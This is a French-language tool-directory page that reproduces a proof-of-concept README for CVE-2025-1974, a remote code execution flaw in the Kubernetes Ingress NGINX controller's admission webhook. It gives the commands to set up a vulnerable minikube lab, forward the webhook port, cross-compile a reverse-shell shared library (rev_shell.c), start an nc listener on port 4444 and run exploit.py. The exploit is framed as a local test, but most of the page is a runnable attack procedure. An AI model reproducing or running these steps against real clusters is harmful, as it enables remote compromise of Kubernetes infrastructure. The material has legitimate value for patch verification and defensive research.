Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-1974 — CVE-2025-1974 code PoC | Kitploit
Outils/GitHubGitHub/zulloper/cve-2025-1974
Sécurité des ConteneursAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionSécurité Cloud
GitHubzulloper/cve-2025-1974

CVE-2025-1974

CVE-2025-1974 code PoC

Voir le dépôt
il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2025-1974: Analyse de la vulnérabilité du contrôleur Kubernetes Ingress Nginx et mise en place d'un environnement PoC

Environnement de test

  • MacOS (M2)
  • Ingress NGINX Controller 1.11.3
  • Rancher Desktop (Docker)
  • Minikube (Kubernetes)

Configuration de l'environnement de test local (M2 MacOS)

Installez minikube pour le test local

minikube start --driver=docker

Configurez ingress-nginx-controller avec la commande suivante

kubectl apply -f ingress-nginx-controller.yml

Redirection de ports

Vérifiez que les Pods fonctionnent correctement

kubectl get pods -n ingress-nginx

kubectl describe <pod name> -n ingress-nginx

Redirigez les ports 80 et 8443 (webhook) des Pods vers les ports locaux 8888 et 1337 (la redirection des ports 80 et 8443 est nécessaire dans les deux cas)

kubectl port-forward -n ingress-nginx <pod name> 8888:80

kubectl port-forward -n ingress-nginx <pod name> 1337:8443

Préparation du fichier so (bibliothèque d'objets partagés)

Modifiez l'IP et le port de connexion du shell inverse dans rev_shell.c

Compilez sous MacOS (arm64), adaptez la compilation à l'environnement de test

aarch64-linux-gnu-gcc -shared -fPIC -o rev_shell.so rev_shell.c

root@kitploit:~
# 크로스컴파일러 설치
brew tap messense/macos-cross-toolchains
brew install aarch64-linux-gnu

Création de l'AdmissionReview (facultatif, vous pouvez utiliser les fichiers générés existants)

Convertissez en format AdmissionReview avec kube-review (json)

./kube-review-darwin-arm64 create admission_test.yml > admission_review_req_body.json

Exploit

Préparez la connexion du shell inverse avec nc

nc -lv 4444

Modifiez l'hôte et le port de nginx et du webhook dans exploit.py, puis exécutez-le

python3 exploit.py

img.png

Télécharger l’outil